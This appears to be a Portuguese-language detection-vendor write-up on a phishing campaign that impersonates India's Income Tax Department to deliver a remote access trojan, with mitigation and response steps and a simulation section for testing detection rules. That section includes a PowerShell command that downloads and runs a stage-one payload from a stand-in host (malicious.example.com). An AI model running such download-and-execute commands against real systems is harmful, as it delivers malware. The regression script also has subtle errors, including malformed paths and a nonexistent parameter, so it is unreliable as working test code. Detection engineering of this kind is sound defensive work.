Campanha de Phishing Finge Ser Imposto de Renda da Índia para Alvejar Empresas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma operação de phishing que imita o Departamento de Imposto de Renda da Índia entrega um PDF armadilhado que direciona os destinatários para um portal de conformidade falso. O site solicita que as vítimas baixem um pacote ZIP contendo um instalador NSIS assinado, que posteriormente implanta um Trojan de Acesso Remoto multiestágio. O RAT persiste ao criar um serviço do Windows e se comunica com vários servidores C2 por portas não padrão.
Investigação
Pesquisadores analisaram a isca em PDF, a URL incorporada e o fluxo de trabalho em cadeia do instalador NSIS. Eles documentaram os binários soltos no disco, a criação de uma pasta de instalação oculta e o registro de NSecRTS.exe como um serviço do Windows. O estudo também capturou comunicações de saída para três endereços IP e destacou o uso de cargas úteis assinadas em toda a cadeia de entrega.
Mitigação
Bloqueie o domínio malicioso e os endereços IP relacionados no perímetro e através de controles de proxy. Reforce as proteções de e-mail para sinalizar anexos e links temáticos de impostos que levam a portais de conformidade semelhantes. Impeça a execução automática de instaladores não confiáveis, sempre que possível, e monitorize a criação de serviços suspeitos – especialmente qualquer coisa nomeada “Windows Real-time Protection Service.”
Resposta
Alerta sobre os nomes de arquivos listados, hashes e atividade de registro de serviços do Windows vinculadas à cadeia de infecção. Isole endpoints afetados, adquira imagens de memória e disco, e realize uma varredura forense completa para identificar quaisquer etapas ou ferramentas adicionais do RAT. Remova artefatos de persistência e redefina credenciais potencialmente expostas para evitar reentrada.
Fluxo de ataque
Detecções
Comando e Controle Suspeito por Solicitação DNS de TLD Incomum (via dns)
Visualizar
IOCs (DestinationIP) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
IOCs (SourceIP) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
IOCs (HashMd5) para detectar: Campanha de Phishing Temática de Imposto de Renda Indiano Alvos Empresas Locais
Visualizar
Detecção de Execução de Malware em Campanha de Phishing Temática de Imposto de Renda Indiano [Criação de Processo do Windows]
Visualizar
Detecção de Comunicação C2 NSecRTS.exe [Conexão de Rede do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Cheque Pré-voo de Telemetria & de Referência deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa do Ataque & Comandos:
Um adversário entrega um e-mail de phishing intitulado “Aviso de Imposto de Renda”. O anexo é um documento Word malicioso que soltasetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%. A vítima executa o arquivo, que por sua vez geraSibuia.exe(a carga verdadeira) como seu filho. Esta cadeia pai-filho é projetada para contornar alertas genéricos de criação de processos, mas é pega pela regra Sigma.Etapas realizadas no host comprometido:
- Solte o binário de primeira etapa:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Execute o binário de primeira etapa:
Start-Process -FilePath $stage1 -NoNewWindow - O binário de primeira etapa cria internamente o binário de segunda etapa
Sibuia.exeno mesmo diretório e o lança: (Simulado pelo script de teste abaixo.)
- Solte o binário de primeira etapa:
-
Script de Teste de Regressão:
O script abaixo reproduz a relação exata pai-filho necessária para disparar a regra.# ------------------------------------------------- # Simulação da cadeia de phishing do Imposto de Renda Indiano # ------------------------------------------------- # Definir caminhos $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Criar binários dummy (zero-byte – suficiente para registro Sysmon) Set-Content -Path $stage1 -Value 'REM placeholder para stage1' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM placeholder para stage2' -Encoding ASCII # Garantir que os arquivos sejam executáveis (Windows não precisa de chmod) Write-Host "[*] Iniciando stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Dar um momento para stage1 “gerar” stage2 (simulado por lançamento direto) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 gerando stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Simulação completa. Verifique a detecção no SIEM." # ------------------------------------------------- -
Comandos de Limpeza:
Remova os artefatos e termine quaisquer processos remanescentes.# Pare quaisquer processos restantes Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Excluir arquivos Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Limpeza completa."